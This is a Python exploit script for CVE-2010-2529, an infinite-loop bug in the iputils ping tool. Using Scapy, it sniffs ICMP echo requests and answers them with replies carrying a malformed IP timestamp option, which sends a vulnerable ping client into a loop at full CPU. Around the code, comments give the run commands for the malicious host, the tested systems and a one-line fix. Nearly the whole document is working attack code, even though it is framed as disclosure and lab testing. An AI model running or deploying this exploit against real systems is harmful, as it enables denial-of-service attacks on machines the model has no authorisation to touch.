#!/usr/bin/env python
#
# Exploit Title: Ping infinite loop
# Date: July 25, 2010
# Author: Anonymous
# Software Link: http://www.skbuff.net/iputils/
# Version: iputils-s20100418
# Tested on: 2.6.26-2-amd64 Debian lenny, 2.6.32-5-amd64 Debian sid, 2.6.32 Arch Linux, 2.6.30-9 Ubuntu 8.10
#            2.6.28-17 Ubuntu 9.04, 2.6.31-14 Ubuntu 9.10, 2.6.32-23 Ubuntu 10.04
# CVE: CVE-2010-2529
# References: MDVSA-2010:138, http://seclists.org/fulldisclosure/2010/Jul/336
# Patch Instructions: none
# Requires: Scapy http://www.secdev.org/projects/scapy/ (and root on the malicious host: sniffing and sending raw packets)
#
# Infinite loop in ping.c, pr_options(), case IPOPT_TS, line 1071-1072: if (i <= 0) continue;
# Proposed fix: replace continue with break
#
# On the malicious host (IP A.B.C.D), as root:
#   # echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all   (stops the kernel from sending its own echo reply next to the crafted one; set it back to 0 afterwards)
#   # python ping-infinite-loop.py A.B.C.D
#
# From a vulnerable system:
#   $ ping A.B.C.D
#   PING A.B.C.D (A.B.C.D) 56(84) bytes of data.
#   [goes into an infinite loop and consumes 100% CPU]
#
# Stop it with 'killall ping' from another shell, or ^Z to suspend it and then 'kill %1', if ^C does not get it out of the loop.
#
from sys import argv,exit
from scapy.all import *

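def reply(s):
  """Answer one sniffed ICMP echo request with an echo reply carrying a malformed IP timestamp option.

  s -- the sniffed Scapy packet; the caller's sniff filter is expected to have
       checked that it has an IP and an ICMP layer.

  The reply mirrors the request (addresses swapped, same ICMP id/seq and payload)
  so that it matches the probe the vulnerable ping is waiting for, then appends
  an IP option of class 'debug', number 4 (IPOPT_TS). Per the file header, ping.c's
  pr_options() reaches `if (i <= 0) continue;` for that option and never advances
  (CVE-2010-2529). The packet is sent immediately; nothing is returned.
  """
  # Mirror the request so the reply is accepted as the answer to it.
  payload = s[Raw] if s.haslayer(Raw) else b''
  p = IP(src=s[IP].dst, dst=s[IP].src) / ICMP(type=0, id=s[ICMP].id, seq=s[ICMP].seq) / payload
  # Option body after the type/length bytes Scapy fills in: pointer=0x05, then 0x04
  # (presumably the overflow/flags byte) and four bytes of filler. The 0x05 pointer is
  # the value that takes pr_options() into the `continue` (see header). A bytes
  # literal keeps these octets unambiguous on both Python 2 and 3.
  p[IP].options = [IPOption(optclass='debug', option='timestamp', value=b'\x05\x04ABCD')]
  send(p, verbose=False)
  # Function-call form prints the same line under Python 2 and 3.
  print("Sent ping 'infinite loop' reply to %s" % p[IP].dst)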

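if __name__ == '__main__':
  # Scapy reports p[IP].dst as a dotted quad, so the target must be one as well; a
  # hostname would never match and the script would sit there silently. Round-tripping
  # through inet_aton/inet_ntoa rejects garbage and canonicalises shorthand such as
  # "10.1" to "10.0.0.1".
  import socket

  if len(argv) < 2:
    print("Usage: %s <IP dst to match>" % argv[0])
    exit(1)
  try:
    target = socket.inet_ntoa(socket.inet_aton(argv[1]))
  except (socket.error, OSError):
    print("%s: not an IPv4 address: %s" % (argv[0], argv[1]))
    exit(1)

  # Sniffing and sending raw packets needs root. Every echo request addressed to the
  # target gets a crafted reply, so run this only in a lab / against hosts you are
  # authorised to test, with icmp_echo_ignore_all=1 so the kernel does not answer too
  # (see header). The filter runs in Python per packet; the explicit IP-layer check
  # keeps a packet that dissects as ICMP without IP from raising inside the filter.
  sniff(lfilter=lambda p: p.haslayer(IP) and p.haslayer(ICMP)
                          and p[ICMP].type == 8 and p[IP].dst == target,
        prn=reply)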
